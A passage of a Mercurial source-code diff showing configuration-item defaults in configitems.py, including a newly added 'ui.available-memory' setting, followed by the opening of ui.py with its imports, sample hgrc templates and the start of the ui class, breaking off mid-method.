1018 1018 b'profiling', b'time-track', default=dynamicdefault,
1019 1019 )
1020 1020 coreconfigitem(
1021 1021 b'profiling', b'type', default=b'stat',
1022 1022 )
1023 1023 coreconfigitem(
1024 1024 b'progress', b'assume-tty', default=False,
1025 1025 )
1026 1026 coreconfigitem(
1027 1027 b'progress', b'changedelay', default=1,
1028 1028 )
1029 1029 coreconfigitem(
1030 1030 b'progress', b'clear-complete', default=True,
1031 1031 )
1032 1032 coreconfigitem(
1033 1033 b'progress', b'debug', default=False,
1034 1034 )
1035 1035 coreconfigitem(
1036 1036 b'progress', b'delay', default=3,
1037 1037 )
1038 1038 coreconfigitem(
1039 1039 b'progress', b'disable', default=False,
1040 1040 )
1041 1041 coreconfigitem(
1042 1042 b'progress', b'estimateinterval', default=60.0,
1043 1043 )
1044 1044 coreconfigitem(
1045 1045 b'progress',
1046 1046 b'format',
1047 1047 default=lambda: [b'topic', b'bar', b'number', b'estimate'],
1048 1048 )
1049 1049 coreconfigitem(
1050 1050 b'progress', b'refresh', default=0.1,
1051 1051 )
1052 1052 coreconfigitem(
1053 1053 b'progress', b'width', default=dynamicdefault,
1054 1054 )
1055 1055 coreconfigitem(
1056 1056 b'pull', b'confirm', default=False,
1057 1057 )
1058 1058 coreconfigitem(
1059 1059 b'push', b'pushvars.server', default=False,
1060 1060 )
1061 1061 coreconfigitem(
1062 1062 b'rewrite',
1063 1063 b'backup-bundle',
1064 1064 default=True,
1065 1065 alias=[(b'ui', b'history-editing-backup')],
1066 1066 )
1067 1067 coreconfigitem(
1068 1068 b'rewrite', b'update-timestamp', default=False,
1069 1069 )
1070 1070 coreconfigitem(
1071 1071 b'storage', b'new-repo-backend', default=b'revlogv1', experimental=True,
1072 1072 )
1073 1073 coreconfigitem(
1074 1074 b'storage',
1075 1075 b'revlog.optimize-delta-parent-choice',
1076 1076 default=True,
1077 1077 alias=[(b'format', b'aggressivemergedeltas')],
1078 1078 )
1079 1079 # experimental as long as rust is experimental (or a C version is implemented)
1080 1080 coreconfigitem(
1081 1081 b'storage', b'revlog.nodemap.mmap', default=True, experimental=True
1082 1082 )
1083 1083 # experimental as long as format.use-persistent-nodemap is.
1084 1084 coreconfigitem(
1085 1085 b'storage', b'revlog.nodemap.mode', default=b'compat', experimental=True
1086 1086 )
1087 1087 coreconfigitem(
1088 1088 b'storage', b'revlog.reuse-external-delta', default=True,
1089 1089 )
1090 1090 coreconfigitem(
1091 1091 b'storage', b'revlog.reuse-external-delta-parent', default=None,
1092 1092 )
1093 1093 coreconfigitem(
1094 1094 b'storage', b'revlog.zlib.level', default=None,
1095 1095 )
1096 1096 coreconfigitem(
1097 1097 b'storage', b'revlog.zstd.level', default=None,
1098 1098 )
1099 1099 coreconfigitem(
1100 1100 b'server', b'bookmarks-pushkey-compat', default=True,
1101 1101 )
1102 1102 coreconfigitem(
1103 1103 b'server', b'bundle1', default=True,
1104 1104 )
1105 1105 coreconfigitem(
1106 1106 b'server', b'bundle1gd', default=None,
1107 1107 )
1108 1108 coreconfigitem(
1109 1109 b'server', b'bundle1.pull', default=None,
1110 1110 )
1111 1111 coreconfigitem(
1112 1112 b'server', b'bundle1gd.pull', default=None,
1113 1113 )
1114 1114 coreconfigitem(
1115 1115 b'server', b'bundle1.push', default=None,
1116 1116 )
1117 1117 coreconfigitem(
1118 1118 b'server', b'bundle1gd.push', default=None,
1119 1119 )
1120 1120 coreconfigitem(
1121 1121 b'server',
1122 1122 b'bundle2.stream',
1123 1123 default=True,
1124 1124 alias=[(b'experimental', b'bundle2.stream')],
1125 1125 )
1126 1126 coreconfigitem(
1127 1127 b'server', b'compressionengines', default=list,
1128 1128 )
1129 1129 coreconfigitem(
1130 1130 b'server', b'concurrent-push-mode', default=b'check-related',
1131 1131 )
1132 1132 coreconfigitem(
1133 1133 b'server', b'disablefullbundle', default=False,
1134 1134 )
1135 1135 coreconfigitem(
1136 1136 b'server', b'maxhttpheaderlen', default=1024,
1137 1137 )
1138 1138 coreconfigitem(
1139 1139 b'server', b'pullbundle', default=False,
1140 1140 )
1141 1141 coreconfigitem(
1142 1142 b'server', b'preferuncompressed', default=False,
1143 1143 )
1144 1144 coreconfigitem(
1145 1145 b'server', b'streamunbundle', default=False,
1146 1146 )
1147 1147 coreconfigitem(
1148 1148 b'server', b'uncompressed', default=True,
1149 1149 )
1150 1150 coreconfigitem(
1151 1151 b'server', b'uncompressedallowsecret', default=False,
1152 1152 )
1153 1153 coreconfigitem(
1154 1154 b'server', b'view', default=b'served',
1155 1155 )
1156 1156 coreconfigitem(
1157 1157 b'server', b'validate', default=False,
1158 1158 )
1159 1159 coreconfigitem(
1160 1160 b'server', b'zliblevel', default=-1,
1161 1161 )
1162 1162 coreconfigitem(
1163 1163 b'server', b'zstdlevel', default=3,
1164 1164 )
1165 1165 coreconfigitem(
1166 1166 b'share', b'pool', default=None,
1167 1167 )
1168 1168 coreconfigitem(
1169 1169 b'share', b'poolnaming', default=b'identity',
1170 1170 )
1171 1171 coreconfigitem(
1172 1172 b'shelve', b'maxbackups', default=10,
1173 1173 )
1174 1174 coreconfigitem(
1175 1175 b'smtp', b'host', default=None,
1176 1176 )
1177 1177 coreconfigitem(
1178 1178 b'smtp', b'local_hostname', default=None,
1179 1179 )
1180 1180 coreconfigitem(
1181 1181 b'smtp', b'password', default=None,
1182 1182 )
1183 1183 coreconfigitem(
1184 1184 b'smtp', b'port', default=dynamicdefault,
1185 1185 )
1186 1186 coreconfigitem(
1187 1187 b'smtp', b'tls', default=b'none',
1188 1188 )
1189 1189 coreconfigitem(
1190 1190 b'smtp', b'username', default=None,
1191 1191 )
1192 1192 coreconfigitem(
1193 1193 b'sparse', b'missingwarning', default=True, experimental=True,
1194 1194 )
1195 1195 coreconfigitem(
1196 1196 b'subrepos',
1197 1197 b'allowed',
1198 1198 default=dynamicdefault, # to make backporting simpler
1199 1199 )
1200 1200 coreconfigitem(
1201 1201 b'subrepos', b'hg:allowed', default=dynamicdefault,
1202 1202 )
1203 1203 coreconfigitem(
1204 1204 b'subrepos', b'git:allowed', default=dynamicdefault,
1205 1205 )
1206 1206 coreconfigitem(
1207 1207 b'subrepos', b'svn:allowed', default=dynamicdefault,
1208 1208 )
1209 1209 coreconfigitem(
1210 1210 b'templates', b'.*', default=None, generic=True,
1211 1211 )
1212 1212 coreconfigitem(
1213 1213 b'templateconfig', b'.*', default=dynamicdefault, generic=True,
1214 1214 )
1215 1215 coreconfigitem(
1216 1216 b'trusted', b'groups', default=list,
1217 1217 )
1218 1218 coreconfigitem(
1219 1219 b'trusted', b'users', default=list,
1220 1220 )
1221 1221 coreconfigitem(
1222 1222 b'ui', b'_usedassubrepo', default=False,
1223 1223 )
1224 1224 coreconfigitem(
1225 1225 b'ui', b'allowemptycommit', default=False,
1226 1226 )
1227 1227 coreconfigitem(
1228 1228 b'ui', b'archivemeta', default=True,
1229 1229 )
1230 1230 coreconfigitem(
1231 1231 b'ui', b'askusername', default=False,
1232 1232 )
1233 1233 coreconfigitem(
1234 b'ui', b'available-memory', default=None,
1235 )
1236
1237 coreconfigitem(
1234 1238 b'ui', b'clonebundlefallback', default=False,
1235 1239 )
1236 1240 coreconfigitem(
1237 1241 b'ui', b'clonebundleprefers', default=list,
1238 1242 )
1239 1243 coreconfigitem(
1240 1244 b'ui', b'clonebundles', default=True,
1241 1245 )
1242 1246 coreconfigitem(
1243 1247 b'ui', b'color', default=b'auto',
1244 1248 )
1245 1249 coreconfigitem(
1246 1250 b'ui', b'commitsubrepos', default=False,
1247 1251 )
1248 1252 coreconfigitem(
1249 1253 b'ui', b'debug', default=False,
1250 1254 )
1251 1255 coreconfigitem(
1252 1256 b'ui', b'debugger', default=None,
1253 1257 )
1254 1258 coreconfigitem(
1255 1259 b'ui', b'editor', default=dynamicdefault,
1256 1260 )
1257 1261 coreconfigitem(
1258 1262 b'ui', b'fallbackencoding', default=None,
1259 1263 )
1260 1264 coreconfigitem(
1261 1265 b'ui', b'forcecwd', default=None,
1262 1266 )
1263 1267 coreconfigitem(
1264 1268 b'ui', b'forcemerge', default=None,
1265 1269 )
1266 1270 coreconfigitem(
1267 1271 b'ui', b'formatdebug', default=False,
1268 1272 )
1269 1273 coreconfigitem(
1270 1274 b'ui', b'formatjson', default=False,
1271 1275 )
1272 1276 coreconfigitem(
1273 1277 b'ui', b'formatted', default=None,
1274 1278 )
1275 1279 coreconfigitem(
1276 1280 b'ui', b'graphnodetemplate', default=None,
1277 1281 )
1278 1282 coreconfigitem(
1279 1283 b'ui', b'interactive', default=None,
1280 1284 )
1281 1285 coreconfigitem(
1282 1286 b'ui', b'interface', default=None,
1283 1287 )
1284 1288 coreconfigitem(
1285 1289 b'ui', b'interface.chunkselector', default=None,
1286 1290 )
1287 1291 coreconfigitem(
1288 1292 b'ui', b'large-file-limit', default=10000000,
1289 1293 )
1290 1294 coreconfigitem(
1291 1295 b'ui', b'logblockedtimes', default=False,
1292 1296 )
1293 1297 coreconfigitem(
1294 1298 b'ui', b'logtemplate', default=None,
1295 1299 )
1296 1300 coreconfigitem(
1297 1301 b'ui', b'merge', default=None,
1298 1302 )
1299 1303 coreconfigitem(
1300 1304 b'ui', b'mergemarkers', default=b'basic',
1301 1305 )
1302 1306 coreconfigitem(
1303 1307 b'ui',
1304 1308 b'mergemarkertemplate',
1305 1309 default=(
1306 1310 b'{node|short} '
1307 1311 b'{ifeq(tags, "tip", "", '
1308 1312 b'ifeq(tags, "", "", "{tags} "))}'
1309 1313 b'{if(bookmarks, "{bookmarks} ")}'
1310 1314 b'{ifeq(branch, "default", "", "{branch} ")}'
1311 1315 b'- {author|user}: {desc|firstline}'
1312 1316 ),
1313 1317 )
1314 1318 coreconfigitem(
1315 1319 b'ui', b'message-output', default=b'stdio',
1316 1320 )
1317 1321 coreconfigitem(
1318 1322 b'ui', b'nontty', default=False,
1319 1323 )
1320 1324 coreconfigitem(
1321 1325 b'ui', b'origbackuppath', default=None,
1322 1326 )
1323 1327 coreconfigitem(
1324 1328 b'ui', b'paginate', default=True,
1325 1329 )
1326 1330 coreconfigitem(
1327 1331 b'ui', b'patch', default=None,
1328 1332 )
1329 1333 coreconfigitem(
1330 1334 b'ui', b'pre-merge-tool-output-template', default=None,
1331 1335 )
1332 1336 coreconfigitem(
1333 1337 b'ui', b'portablefilenames', default=b'warn',
1334 1338 )
1335 1339 coreconfigitem(
1336 1340 b'ui', b'promptecho', default=False,
1337 1341 )
1338 1342 coreconfigitem(
1339 1343 b'ui', b'quiet', default=False,
1340 1344 )
1341 1345 coreconfigitem(
1342 1346 b'ui', b'quietbookmarkmove', default=False,
1343 1347 )
1344 1348 coreconfigitem(
1345 1349 b'ui', b'relative-paths', default=b'legacy',
1346 1350 )
1347 1351 coreconfigitem(
1348 1352 b'ui', b'remotecmd', default=b'hg',
1349 1353 )
1350 1354 coreconfigitem(
1351 1355 b'ui', b'report_untrusted', default=True,
1352 1356 )
1353 1357 coreconfigitem(
1354 1358 b'ui', b'rollback', default=True,
1355 1359 )
1356 1360 coreconfigitem(
1357 1361 b'ui', b'signal-safe-lock', default=True,
1358 1362 )
1359 1363 coreconfigitem(
1360 1364 b'ui', b'slash', default=False,
1361 1365 )
1362 1366 coreconfigitem(
1363 1367 b'ui', b'ssh', default=b'ssh',
1364 1368 )
1365 1369 coreconfigitem(
1366 1370 b'ui', b'ssherrorhint', default=None,
1367 1371 )
1368 1372 coreconfigitem(
1369 1373 b'ui', b'statuscopies', default=False,
1370 1374 )
1371 1375 coreconfigitem(
1372 1376 b'ui', b'strict', default=False,
1373 1377 )
1374 1378 coreconfigitem(
1375 1379 b'ui', b'style', default=b'',
1376 1380 )
1377 1381 coreconfigitem(
1378 1382 b'ui', b'supportcontact', default=None,
1379 1383 )
1380 1384 coreconfigitem(
1381 1385 b'ui', b'textwidth', default=78,
1382 1386 )
1383 1387 coreconfigitem(
1384 1388 b'ui', b'timeout', default=b'600',
1385 1389 )
1386 1390 coreconfigitem(
1387 1391 b'ui', b'timeout.warn', default=0,
1388 1392 )
1389 1393 coreconfigitem(
1390 1394 b'ui', b'timestamp-output', default=False,
1391 1395 )
1392 1396 coreconfigitem(
1393 1397 b'ui', b'traceback', default=False,
1394 1398 )
1395 1399 coreconfigitem(
1396 1400 b'ui', b'tweakdefaults', default=False,
1397 1401 )
1398 1402 coreconfigitem(b'ui', b'username', alias=[(b'ui', b'user')])
1399 1403 coreconfigitem(
1400 1404 b'ui', b'verbose', default=False,
1401 1405 )
1402 1406 coreconfigitem(
1403 1407 b'verify', b'skipflags', default=None,
1404 1408 )
1405 1409 coreconfigitem(
1406 1410 b'web', b'allowbz2', default=False,
1407 1411 )
1408 1412 coreconfigitem(
1409 1413 b'web', b'allowgz', default=False,
1410 1414 )
1411 1415 coreconfigitem(
1412 1416 b'web', b'allow-pull', alias=[(b'web', b'allowpull')], default=True,
1413 1417 )
1414 1418 coreconfigitem(
1415 1419 b'web', b'allow-push', alias=[(b'web', b'allow_push')], default=list,
1416 1420 )
1417 1421 coreconfigitem(
1418 1422 b'web', b'allowzip', default=False,
1419 1423 )
1420 1424 coreconfigitem(
1421 1425 b'web', b'archivesubrepos', default=False,
1422 1426 )
1423 1427 coreconfigitem(
1424 1428 b'web', b'cache', default=True,
1425 1429 )
1426 1430 coreconfigitem(
1427 1431 b'web', b'comparisoncontext', default=5,
1428 1432 )
1429 1433 coreconfigitem(
1430 1434 b'web', b'contact', default=None,
1431 1435 )
1432 1436 coreconfigitem(
1433 1437 b'web', b'deny_push', default=list,
1434 1438 )
1435 1439 coreconfigitem(
1436 1440 b'web', b'guessmime', default=False,
1437 1441 )
1438 1442 coreconfigitem(
1439 1443 b'web', b'hidden', default=False,
1440 1444 )
1441 1445 coreconfigitem(
1442 1446 b'web', b'labels', default=list,
1443 1447 )
1444 1448 coreconfigitem(
1445 1449 b'web', b'logoimg', default=b'hglogo.png',
1446 1450 )
1447 1451 coreconfigitem(
1448 1452 b'web', b'logourl', default=b'https://mercurial-scm.org/',
1449 1453 )
1450 1454 coreconfigitem(
1451 1455 b'web', b'accesslog', default=b'-',
1452 1456 )
1453 1457 coreconfigitem(
1454 1458 b'web', b'address', default=b'',
1455 1459 )
1456 1460 coreconfigitem(
1457 1461 b'web', b'allow-archive', alias=[(b'web', b'allow_archive')], default=list,
1458 1462 )
1459 1463 coreconfigitem(
1460 1464 b'web', b'allow_read', default=list,
1461 1465 )
1462 1466 coreconfigitem(
1463 1467 b'web', b'baseurl', default=None,
1464 1468 )
1465 1469 coreconfigitem(
1466 1470 b'web', b'cacerts', default=None,
1467 1471 )
1468 1472 coreconfigitem(
1469 1473 b'web', b'certificate', default=None,
1470 1474 )
1471 1475 coreconfigitem(
1472 1476 b'web', b'collapse', default=False,
1473 1477 )
1474 1478 coreconfigitem(
1475 1479 b'web', b'csp', default=None,
1476 1480 )
1477 1481 coreconfigitem(
1478 1482 b'web', b'deny_read', default=list,
1479 1483 )
1480 1484 coreconfigitem(
1481 1485 b'web', b'descend', default=True,
1482 1486 )
1483 1487 coreconfigitem(
1484 1488 b'web', b'description', default=b"",
1485 1489 )
1486 1490 coreconfigitem(
1487 1491 b'web', b'encoding', default=lambda: encoding.encoding,
1488 1492 )
1489 1493 coreconfigitem(
1490 1494 b'web', b'errorlog', default=b'-',
1491 1495 )
1492 1496 coreconfigitem(
1493 1497 b'web', b'ipv6', default=False,
1494 1498 )
1495 1499 coreconfigitem(
1496 1500 b'web', b'maxchanges', default=10,
1497 1501 )
1498 1502 coreconfigitem(
1499 1503 b'web', b'maxfiles', default=10,
1500 1504 )
1501 1505 coreconfigitem(
1502 1506 b'web', b'maxshortchanges', default=60,
1503 1507 )
1504 1508 coreconfigitem(
1505 1509 b'web', b'motd', default=b'',
1506 1510 )
1507 1511 coreconfigitem(
1508 1512 b'web', b'name', default=dynamicdefault,
1509 1513 )
1510 1514 coreconfigitem(
1511 1515 b'web', b'port', default=8000,
1512 1516 )
1513 1517 coreconfigitem(
1514 1518 b'web', b'prefix', default=b'',
1515 1519 )
1516 1520 coreconfigitem(
1517 1521 b'web', b'push_ssl', default=True,
1518 1522 )
1519 1523 coreconfigitem(
1520 1524 b'web', b'refreshinterval', default=20,
1521 1525 )
1522 1526 coreconfigitem(
1523 1527 b'web', b'server-header', default=None,
1524 1528 )
1525 1529 coreconfigitem(
1526 1530 b'web', b'static', default=None,
1527 1531 )
1528 1532 coreconfigitem(
1529 1533 b'web', b'staticurl', default=None,
1530 1534 )
1531 1535 coreconfigitem(
1532 1536 b'web', b'stripes', default=1,
1533 1537 )
1534 1538 coreconfigitem(
1535 1539 b'web', b'style', default=b'paper',
1536 1540 )
1537 1541 coreconfigitem(
1538 1542 b'web', b'templates', default=None,
1539 1543 )
1540 1544 coreconfigitem(
1541 1545 b'web', b'view', default=b'served', experimental=True,
1542 1546 )
1543 1547 coreconfigitem(
1544 1548 b'worker', b'backgroundclose', default=dynamicdefault,
1545 1549 )
1546 1550 # Windows defaults to a limit of 512 open files. A buffer of 128
1547 1551 # should give us enough headway.
1548 1552 coreconfigitem(
1549 1553 b'worker', b'backgroundclosemaxqueue', default=384,
1550 1554 )
1551 1555 coreconfigitem(
1552 1556 b'worker', b'backgroundcloseminfilecount', default=2048,
1553 1557 )
1554 1558 coreconfigitem(
1555 1559 b'worker', b'backgroundclosethreadcount', default=4,
1556 1560 )
1557 1561 coreconfigitem(
1558 1562 b'worker', b'enabled', default=True,
1559 1563 )
1560 1564 coreconfigitem(
1561 1565 b'worker', b'numcpus', default=None,
1562 1566 )
1563 1567
1564 1568 # Rebase related configuration moved to core because other extension are doing
1565 1569 # strange things. For example, shelve import the extensions to reuse some bit
1566 1570 # without formally loading it.
1567 1571 coreconfigitem(
1568 1572 b'commands', b'rebase.requiredest', default=False,
1569 1573 )
1570 1574 coreconfigitem(
1571 1575 b'experimental', b'rebaseskipobsolete', default=True,
1572 1576 )
1573 1577 coreconfigitem(
1574 1578 b'rebase', b'singletransaction', default=False,
1575 1579 )
1576 1580 coreconfigitem(
1577 1581 b'rebase', b'experimental.inmemory', default=False,
1578 1582 )
@@ -1,2352 +1,2368 b''
1 1 # ui.py - user interface bits for mercurial
2 2 #
3 3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import collections
11 11 import contextlib
12 12 import datetime
13 13 import errno
14 14 import getpass
15 15 import inspect
16 16 import os
17 17 import re
18 18 import signal
19 19 import socket
20 20 import subprocess
21 21 import sys
22 22 import traceback
23 23
24 24 from .i18n import _
25 25 from .node import hex
26 26 from .pycompat import (
27 27 getattr,
28 28 open,
29 29 setattr,
30 30 )
31 31
32 32 from . import (
33 33 color,
34 34 config,
35 35 configitems,
36 36 encoding,
37 37 error,
38 38 formatter,
39 39 loggingutil,
40 40 progress,
41 41 pycompat,
42 42 rcutil,
43 43 scmutil,
44 44 util,
45 45 )
46 46 from .utils import (
47 47 dateutil,
48 48 procutil,
49 49 resourceutil,
50 50 stringutil,
51 51 )
52 52
53 53 urlreq = util.urlreq
54 54
55 55 # for use with str.translate(None, _keepalnum), to keep just alphanumerics
56 56 _keepalnum = b''.join(
57 57 c for c in map(pycompat.bytechr, range(256)) if not c.isalnum()
58 58 )
59 59
60 60 # The config knobs that will be altered (if unset) by ui.tweakdefaults.
61 61 tweakrc = b"""
62 62 [ui]
63 63 # The rollback command is dangerous. As a rule, don't use it.
64 64 rollback = False
65 65 # Make `hg status` report copy information
66 66 statuscopies = yes
67 67 # Prefer curses UIs when available. Revert to plain-text with `text`.
68 68 interface = curses
69 69 # Make compatible commands emit cwd-relative paths by default.
70 70 relative-paths = yes
71 71
72 72 [commands]
73 73 # Grep working directory by default.
74 74 grep.all-files = True
75 75 # Refuse to perform an `hg update` that would cause a file content merge
76 76 update.check = noconflict
77 77 # Show conflicts information in `hg status`
78 78 status.verbose = True
79 79 # Make `hg resolve` with no action (like `-m`) fail instead of re-merging.
80 80 resolve.explicit-re-merge = True
81 81
82 82 [diff]
83 83 git = 1
84 84 showfunc = 1
85 85 word-diff = 1
86 86 """
87 87
88 88 samplehgrcs = {
89 89 b'user': b"""# example user config (see 'hg help config' for more info)
90 90 [ui]
91 91 # name and email, e.g.
92 92 # username = Jane Doe <jdoe@example.com>
93 93 username =
94 94
95 95 # We recommend enabling tweakdefaults to get slight improvements to
96 96 # the UI over time. Make sure to set HGPLAIN in the environment when
97 97 # writing scripts!
98 98 # tweakdefaults = True
99 99
100 100 # uncomment to disable color in command output
101 101 # (see 'hg help color' for details)
102 102 # color = never
103 103
104 104 # uncomment to disable command output pagination
105 105 # (see 'hg help pager' for details)
106 106 # paginate = never
107 107
108 108 [extensions]
109 109 # uncomment the lines below to enable some popular extensions
110 110 # (see 'hg help extensions' for more info)
111 111 #
112 112 # histedit =
113 113 # rebase =
114 114 # uncommit =
115 115 """,
116 116 b'cloned': b"""# example repository config (see 'hg help config' for more info)
117 117 [paths]
118 118 default = %s
119 119
120 120 # path aliases to other clones of this repo in URLs or filesystem paths
121 121 # (see 'hg help config.paths' for more info)
122 122 #
123 123 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
124 124 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
125 125 # my-clone = /home/jdoe/jdoes-clone
126 126
127 127 [ui]
128 128 # name and email (local to this repository, optional), e.g.
129 129 # username = Jane Doe <jdoe@example.com>
130 130 """,
131 131 b'local': b"""# example repository config (see 'hg help config' for more info)
132 132 [paths]
133 133 # path aliases to other clones of this repo in URLs or filesystem paths
134 134 # (see 'hg help config.paths' for more info)
135 135 #
136 136 # default = http://example.com/hg/example-repo
137 137 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
138 138 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
139 139 # my-clone = /home/jdoe/jdoes-clone
140 140
141 141 [ui]
142 142 # name and email (local to this repository, optional), e.g.
143 143 # username = Jane Doe <jdoe@example.com>
144 144 """,
145 145 b'global': b"""# example system-wide hg config (see 'hg help config' for more info)
146 146
147 147 [ui]
148 148 # uncomment to disable color in command output
149 149 # (see 'hg help color' for details)
150 150 # color = never
151 151
152 152 # uncomment to disable command output pagination
153 153 # (see 'hg help pager' for details)
154 154 # paginate = never
155 155
156 156 [extensions]
157 157 # uncomment the lines below to enable some popular extensions
158 158 # (see 'hg help extensions' for more info)
159 159 #
160 160 # blackbox =
161 161 # churn =
162 162 """,
163 163 }
164 164
165 165
166 166 def _maybestrurl(maybebytes):
167 167 return pycompat.rapply(pycompat.strurl, maybebytes)
168 168
169 169
170 170 def _maybebytesurl(maybestr):
171 171 return pycompat.rapply(pycompat.bytesurl, maybestr)
172 172
173 173
174 174 class httppasswordmgrdbproxy(object):
175 175 """Delays loading urllib2 until it's needed."""
176 176
177 177 def __init__(self):
178 178 self._mgr = None
179 179
180 180 def _get_mgr(self):
181 181 if self._mgr is None:
182 182 self._mgr = urlreq.httppasswordmgrwithdefaultrealm()
183 183 return self._mgr
184 184
185 185 def add_password(self, realm, uris, user, passwd):
186 186 return self._get_mgr().add_password(
187 187 _maybestrurl(realm),
188 188 _maybestrurl(uris),
189 189 _maybestrurl(user),
190 190 _maybestrurl(passwd),
191 191 )
192 192
193 193 def find_user_password(self, realm, uri):
194 194 mgr = self._get_mgr()
195 195 return _maybebytesurl(
196 196 mgr.find_user_password(_maybestrurl(realm), _maybestrurl(uri))
197 197 )
198 198
199 199
200 200 def _catchterm(*args):
201 201 raise error.SignalInterrupt
202 202
203 203
204 204 # unique object used to detect no default value has been provided when
205 205 # retrieving configuration value.
206 206 _unset = object()
207 207
208 208 # _reqexithandlers: callbacks run at the end of a request
209 209 _reqexithandlers = []
210 210
211 211
212 212 class ui(object):
213 213 def __init__(self, src=None):
214 214 """Create a fresh new ui object if no src given
215 215
216 216 Use uimod.ui.load() to create a ui which knows global and user configs.
217 217 In most cases, you should use ui.copy() to create a copy of an existing
218 218 ui object.
219 219 """
220 220 # _buffers: used for temporary capture of output
221 221 self._buffers = []
222 222 # 3-tuple describing how each buffer in the stack behaves.
223 223 # Values are (capture stderr, capture subprocesses, apply labels).
224 224 self._bufferstates = []
225 225 # When a buffer is active, defines whether we are expanding labels.
226 226 # This exists to prevent an extra list lookup.
227 227 self._bufferapplylabels = None
228 228 self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
229 229 self._reportuntrusted = True
230 230 self._knownconfig = configitems.coreitems
231 231 self._ocfg = config.config() # overlay
232 232 self._tcfg = config.config() # trusted
233 233 self._ucfg = config.config() # untrusted
234 234 self._trustusers = set()
235 235 self._trustgroups = set()
236 236 self.callhooks = True
237 237 # Insecure server connections requested.
238 238 self.insecureconnections = False
239 239 # Blocked time
240 240 self.logblockedtimes = False
241 241 # color mode: see mercurial/color.py for possible value
242 242 self._colormode = None
243 243 self._terminfoparams = {}
244 244 self._styles = {}
245 245 self._uninterruptible = False
246 246 self.showtimestamp = False
247 247
248 248 if src:
249 249 self._fout = src._fout
250 250 self._ferr = src._ferr
251 251 self._fin = src._fin
252 252 self._fmsg = src._fmsg
253 253 self._fmsgout = src._fmsgout
254 254 self._fmsgerr = src._fmsgerr
255 255 self._finoutredirected = src._finoutredirected
256 256 self._loggers = src._loggers.copy()
257 257 self.pageractive = src.pageractive
258 258 self._disablepager = src._disablepager
259 259 self._tweaked = src._tweaked
260 260
261 261 self._tcfg = src._tcfg.copy()
262 262 self._ucfg = src._ucfg.copy()
263 263 self._ocfg = src._ocfg.copy()
264 264 self._trustusers = src._trustusers.copy()
265 265 self._trustgroups = src._trustgroups.copy()
266 266 self.environ = src.environ
267 267 self.callhooks = src.callhooks
268 268 self.insecureconnections = src.insecureconnections
269 269 self._colormode = src._colormode
270 270 self._terminfoparams = src._terminfoparams.copy()
271 271 self._styles = src._styles.copy()
272 272
273 273 self.fixconfig()
274 274
275 275 self.httppasswordmgrdb = src.httppasswordmgrdb
276 276 self._blockedtimes = src._blockedtimes
277 277 else:
278 278 self._fout = procutil.stdout
279 279 self._ferr = procutil.stderr
280 280 self._fin = procutil.stdin
281 281 self._fmsg = None
282 282 self._fmsgout = self.fout # configurable
283 283 self._fmsgerr = self.ferr # configurable
284 284 self._finoutredirected = False
285 285 self._loggers = {}
286 286 self.pageractive = False
287 287 self._disablepager = False
288 288 self._tweaked = False
289 289
290 290 # shared read-only environment
291 291 self.environ = encoding.environ
292 292
293 293 self.httppasswordmgrdb = httppasswordmgrdbproxy()
294 294 self._blockedtimes = collections.defaultdict(int)
295 295
296 296 allowed = self.configlist(b'experimental', b'exportableenviron')
297 297 if b'*' in allowed:
298 298 self._exportableenviron = self.environ
299 299 else:
300 300 self._exportableenviron = {}
301 301 for k in allowed:
302 302 if k in self.environ:
303 303 self._exportableenviron[k] = self.environ[k]
304 304
305 305 @classmethod
306 306 def load(cls):
307 307 """Create a ui and load global and user configs"""
308 308 u = cls()
309 309 # we always trust global config files and environment variables
310 310 for t, f in rcutil.rccomponents():
311 311 if t == b'path':
312 312 u.readconfig(f, trust=True)
313 313 elif t == b'resource':
314 314 u.read_resource_config(f, trust=True)
315 315 elif t == b'items':
316 316 sections = set()
317 317 for section, name, value, source in f:
318 318 # do not set u._ocfg
319 319 # XXX clean this up once immutable config object is a thing
320 320 u._tcfg.set(section, name, value, source)
321 321 u._ucfg.set(section, name, value, source)
322 322 sections.add(section)
323 323 for section in sections:
324 324 u.fixconfig(section=section)
325 325 else:
326 326 raise error.ProgrammingError(b'unknown rctype: %s' % t)
327 327 u._maybetweakdefaults()
328 328 return u
329 329
330 330 def _maybetweakdefaults(self):
331 331 if not self.configbool(b'ui', b'tweakdefaults'):
332 332 return
333 333 if self._tweaked or self.plain(b'tweakdefaults'):
334 334 return
335 335
336 336 # Note: it is SUPER IMPORTANT that you set self._tweaked to
337 337 # True *before* any calls to setconfig(), otherwise you'll get
338 338 # infinite recursion between setconfig and this method.
339 339 #
340 340 # TODO: We should extract an inner method in setconfig() to
341 341 # avoid this weirdness.
342 342 self._tweaked = True
343 343 tmpcfg = config.config()
344 344 tmpcfg.parse(b'<tweakdefaults>', tweakrc)
345 345 for section in tmpcfg:
346 346 for name, value in tmpcfg.items(section):
347 347 if not self.hasconfig(section, name):
348 348 self.setconfig(section, name, value, b"<tweakdefaults>")
349 349
350 350 def copy(self):
351 351 return self.__class__(self)
352 352
353 353 def resetstate(self):
354 354 """Clear internal state that shouldn't persist across commands"""
355 355 if self._progbar:
356 356 self._progbar.resetstate() # reset last-print time of progress bar
357 357 self.httppasswordmgrdb = httppasswordmgrdbproxy()
358 358
359 359 @contextlib.contextmanager
360 360 def timeblockedsection(self, key):
361 361 # this is open-coded below - search for timeblockedsection to find them
362 362 starttime = util.timer()
363 363 try:
364 364 yield
365 365 finally:
366 366 self._blockedtimes[key + b'_blocked'] += (
367 367 util.timer() - starttime
368 368 ) * 1000
369 369
370 370 @contextlib.contextmanager
371 371 def uninterruptible(self):
372 372 """Mark an operation as unsafe.
373 373
374 374 Most operations on a repository are safe to interrupt, but a
375 375 few are risky (for example repair.strip). This context manager
376 376 lets you advise Mercurial that something risky is happening so
377 377 that control-C etc can be blocked if desired.
378 378 """
379 379 enabled = self.configbool(b'experimental', b'nointerrupt')
380 380 if enabled and self.configbool(
381 381 b'experimental', b'nointerrupt-interactiveonly'
382 382 ):
383 383 enabled = self.interactive()
384 384 if self._uninterruptible or not enabled:
385 385 # if nointerrupt support is turned off, the process isn't
386 386 # interactive, or we're already in an uninterruptible
387 387 # block, do nothing.
388 388 yield
389 389 return
390 390
391 391 def warn():
392 392 self.warn(_(b"shutting down cleanly\n"))
393 393 self.warn(
